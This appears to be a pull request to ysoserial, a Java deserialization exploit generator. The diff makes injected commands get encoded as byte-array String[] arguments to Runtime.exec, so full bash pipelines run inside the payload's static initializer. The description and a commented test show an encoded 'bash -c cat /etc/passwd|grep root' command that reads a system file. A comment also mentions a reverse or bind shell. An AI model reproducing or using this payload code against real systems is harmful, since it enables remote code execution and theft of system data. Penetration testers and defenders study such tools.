### PR TITLE
fix cmd decode, can not support String[]

### DIFF
--- a/src/main/java/ysoserial/payloads/util/Gadgets.java
+++ b/src/main/java/ysoserial/payloads/util/Gadgets.java
@@ -114,9 +114,10 @@ public class Gadgets {
         final CtClass clazz = pool.get(StubTransletPayload.class.getName());
         // run command in static initializer
         // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
-        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
-            command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
-            "\");";
+        String cmd = "java.lang.Runtime.getRuntime().exec(" +
+        		PayloadRunner.getCmd(command) +
+                ");";
+        
         clazz.makeClassInitializer().insertAfter(cmd);
         // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
         clazz.setName("ysoserial.Pwner" + System.nanoTime());

--- a/src/main/java/ysoserial/payloads/util/PayloadRunner.java
+++ b/src/main/java/ysoserial/payloads/util/PayloadRunner.java
@@ -74,7 +74,9 @@ public class PayloadRunner {
 	
 //	public static void main(String []args)
 //	{
-//		System.out.println(getCmd("bash\n-c\necho"));
+////		System.out.println(getCmd("bash%0a-c%0acat /etc/passwd|grep root"));
+//		String []a = new String[] {new String(new byte[] {98,97,115,104}),new String(new byte[] {45,99}),new String(new byte[] {99,97,116,32,47,101,116,99,47,112,97,115,115,119,100,124,103,114,101,112,32,114,111,111,116})};
+//		System.out.println(a);
 //	}
 
     public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {

--- a/src/main/java/ysoserial/payloads/util/PayloadRunner.java
+++ b/src/main/java/ysoserial/payloads/util/PayloadRunner.java
@@ -4,6 +4,8 @@ import java.util.concurrent.Callable;
 
 import ysoserial.Deserializer;
 import ysoserial.Serializer;
+import static ysoserial.Deserializer.deserialize;		
+import static ysoserial.Serializer.serialize;
 import ysoserial.payloads.ObjectPayload;
 import ysoserial.payloads.ObjectPayload.Utils;
 import ysoserial.secmgr.ExecCheckingSecurityManager;

--- a/src/main/java/ysoserial/payloads/util/PayloadRunner.java
+++ b/src/main/java/ysoserial/payloads/util/PayloadRunner.java
@@ -4,8 +4,6 @@ import java.util.concurrent.Callable;
 
 import ysoserial.Deserializer;
 import ysoserial.Serializer;
-import static ysoserial.Deserializer.deserialize;
-import static ysoserial.Serializer.serialize;
 import ysoserial.payloads.ObjectPayload;
 import ysoserial.payloads.ObjectPayload.Utils;
 import ysoserial.secmgr.ExecCheckingSecurityManager;
@@ -15,6 +13,69 @@ import ysoserial.secmgr.ExecCheckingSecurityManager;
  */
 @SuppressWarnings("unused")
 public class PayloadRunner {
+	
+	/**
+	 * check string to args
+	 * @param s
+	 * @return
+	 */
+	public static int checkStrIsArgs(String s)
+	{
+		if(null == s || 0 == s.trim().length())return -1;
+		if(-1 < s.indexOf('\n'))return 1;
+		try {
+			s = java.net.URLDecoder.decode(s, "utf-8");
+			if(-1 < s.indexOf('\n'))return 2;
+		}catch(Exception e) {}
+		
+		return -1;
+	}
+	
+	public static String[] str2args(String s,int t)
+	{
+		if(1 == t)return s.split("\\n");
+		if(2 == t)
+		{
+			try {
+				s = java.net.URLDecoder.decode(s, "utf-8");
+				return s.split("\\n");
+			}catch(Exception e) {}
+		}
+//		if(-1 == t)return new String[]{s};
+		return new String[]{s};
+	}
+	
+	public static String getCmd(String s)
+	{
+		int t = checkStrIsArgs(s);
+		String []a = str2args(s,t);
+		
+		StringBuilder sb = new StringBuilder("new String[] {"); 
+		for(int i = 0; i < a.length; i++)
+		{
+			if(0 < i)sb.append(",");
+			sb.append("new String(new byte[] {");
+			try{
+				byte []X = a[i].getBytes("UTF-8");
+				for(int x = 0; x < X.length;x++)
+				{
+					if(0 < x)sb.append(",");
+					sb.append(X[x]);
+				}
+			}catch(Exception e) {}
+			
+			sb.append("})");
+		}
+		
+		
+		sb.append("}");
+		return sb.toString();
+	}
+	
+//	public static void main(String []args)
+//	{
+//		System.out.println(getCmd("bash\n-c\necho"));
+//	}
 
     public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
 		// ensure payload generation doesn't throw an exception

--- a/src/test/java/ysoserial/test/payloads/RemoteClassLoadingTest.java
+++ b/src/test/java/ysoserial/test/payloads/RemoteClassLoadingTest.java
@@ -12,6 +12,7 @@ import fi.iki.elonen.NanoHTTPD.Response.Status;
 import javassist.ClassClassPath;
 import javassist.ClassPool;
 import javassist.CtClass;
+import ysoserial.payloads.util.PayloadRunner;
 import ysoserial.test.WrappedTest;
 
 
@@ -54,7 +55,7 @@ public class RemoteClassLoadingTest implements WrappedTest {
             pool.insertClassPath(new ClassClassPath(Exploit.class));
             final CtClass clazz = pool.get(Exploit.class.getName());
             clazz.setName(this.className);
-            clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") + "\");");
+            clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(" + PayloadRunner.getCmd(command) + ");");
             return clazz.toBytecode();
         }
         catch ( Exception e ) {


### PR DESCRIPTION
so, cmd support
1、
 bash\n-c\necho xxx
decode to
"new String[] {new String(new byte[] {98,97,115,104,92,110,45,99,92,110,101,99,104,111,32,120,120,120})}"

2、
bash%0a-c%0acat /etc/passwd|grep root

decode to
"new String[] {new String(new byte[] {98,97,115,104}),new String(new byte[] {45,99}),new String(new byte[] {99,97,116,32,47,101,116,99,47,112,97,115,115,119,100,124,103,114,101,112,32,114,111,111,116})}"